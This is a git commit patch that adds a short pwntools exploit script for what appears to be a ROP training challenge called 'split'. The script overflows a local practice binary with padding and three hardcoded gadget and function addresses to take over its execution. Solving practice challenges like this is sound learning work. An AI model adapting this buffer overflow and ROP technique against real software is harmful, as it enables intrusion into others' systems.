From ae586f332c3fa2919fca99b0ff8acf1e339b0061 Mon Sep 17 00:00:00 2001
From: Brett Weiland <brett_weiland@bpcspace.com>
Date: Mon, 14 Dec 2020 18:27:06 -0600
Subject: 	new file:   x86_64/ret2win/.gdb_history 	new file:  
 x86_64/ret2win/core 	new file:   x86_64/ret2win/exploit.py 	new file:  
 x86_64/split/.gdb_history 	new file:   x86_64/split/core 	new file:  
 x86_64/split/core.split.25050 	new file:   x86_64/split/exploit.py 	new
 file:   x86_64/split/fuckyou 	new file:   x86_64/split/xaa

---
 x86_64/split/exploit.py | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100755 x86_64/split/exploit.py

(limited to 'x86_64/split/exploit.py')

diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py
new file mode 100755
index 0000000..0340b77
--- /dev/null
+++ b/x86_64/split/exploit.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+
+for c in range(40): #originally 40
+    payload += b'a'
+
+payload += p64(0x00000000004007c3) 
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+
+prog.sendline(payload)
+prog.interactive()
-- 
cgit v1.2.3